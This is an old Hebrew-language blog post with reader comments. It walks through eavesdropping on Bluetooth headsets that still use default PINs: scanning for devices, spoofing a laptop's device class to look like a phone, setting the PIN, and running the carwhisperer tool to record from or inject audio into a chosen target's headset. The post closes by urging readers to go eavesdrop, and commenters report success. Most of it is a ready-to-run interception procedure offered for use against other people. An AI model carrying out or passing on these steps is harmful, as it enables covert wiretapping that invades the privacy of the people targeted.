יום חמישי, 13 בנובמבר 2008

Bluetooth Hacking

תחשבו על הדבר הבא, לכמה ממכם יש אוזנית Bluetooth שנמצאת לידכם או לחילופין מחוברת לאוזן כל הזמן, כמו כן לכמה ממכם יש דיבורית Bluetooth באוטו ?
כאשר הגדרתם את האוזניה בפעם הראשונה נדרשתם להקיש קוד ברירת מחדל כגון:
0000
1234
1111
וכדומה נכון ?
לאחר הקשת הקוד התאפשר לכם להתחבר למכשיר הטלפון ולהשתמש באוזניה לפעילות יום יומית.
אז לאן אני חותר כפי שאתם יודעים קוד זה הוא ברירת מחדל ולא רק אנחנו יודעים עליו אלא גם האקרים שמחפשים סתם להשתעשע או לחילופין לבצע תקיפה ממוקדת.
ובעזרת קוד זה ניתן בדגמים מסוימים (שלא דורשים לחיצה על האוזניה) להתחבר ללא כל בעיה לאוזניה ולבצע תהליך של Pairing שבסופו ניתן להפוך את האוזניה למכשיר ציתות.
נשמע נחמד לא אז איך ניתן לבצע זאת
על מנת לבצע תהליך שכזה דרושים לנו המרכיבים הבאים
מחשב נייד
רכיב Bluetooth
מערכת הפעלה Linux
דרייברים של Bluetooth ו - bluez dev
לאחר שהתקנתם את הדרייברים ניתן לבחון האם ה – Bluetooth עובד בעזרת פקודת


Hcitool scan


פקודה זו תציג לכם את המכשירים אשר יש להם Bluetooth פעיל בקירבתכם.
השלב הבא הוא להפוך את המכשיר שלנו ממחשב למכשיר טלפון, על מנת שהאוזניה תאפשר לנו להתחבר אנו צריכים לגרום לה לחשוב שאנחנו טלפון ולא מחשב.
להלן רשימת הפקודות לביצוע:


Hciconfig hci0 class

פקודה זו מאפשרת לנו לראות כי אנחנו מוגדרים כמצב מחשב


Hciconfig hci0 0x50204

פקודה זו מחליפה את הגדרות ה – Bluetooth כך שיחשבו שהמחשב שלנו הוא מכשיר טלפון


Hciconfig hci0 class


הרצה נוספת של פקודה זו תציג לנו כי מצבנו השתנה וכי אנו מוגדרים כטלפון.


Nano /etc/blutooth/pin => 0000


פקודה זו תאפשר לנו להגדיר את PIN ברירת המחדל של האוזניה.

לאחר סיום ההגדרות יש להוריד את הכלי הבא:
http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
כלי זה מאפשר לנו להתחבר לאוזניה ולהקליט שמע ממנה (כמו מכשיר ציתות) או לחילופין להשמיע שמע לאוזניה.
הפקודה לביצוע הפעולה היא:


./ Carwhisperer hci0 voiceput.raw voiceget.raw bdaddr_of_target

על מנת לאתר את יעד התקיפה ניתן להשתמש בפקודת


Hcitool scan


ולבחור את יעד התקיפה.

זהו יאללה לכו תצותתו

3 תגובות:

יניב כהן אמר/ה...

בדקתי עבד על אוזנייה אחת שיש לי :)

blueray7 אמר/ה...

על איזה איזה אוזניה זה עובד ??
לא עובד על פלנטרוניקס ~~

רוני בכר אמר/ה...

על אוזניות שמאפשרות חיבור ללא לחיצה על הלחצן ובעלות קוד ברירת מחדל כדוגמת 0000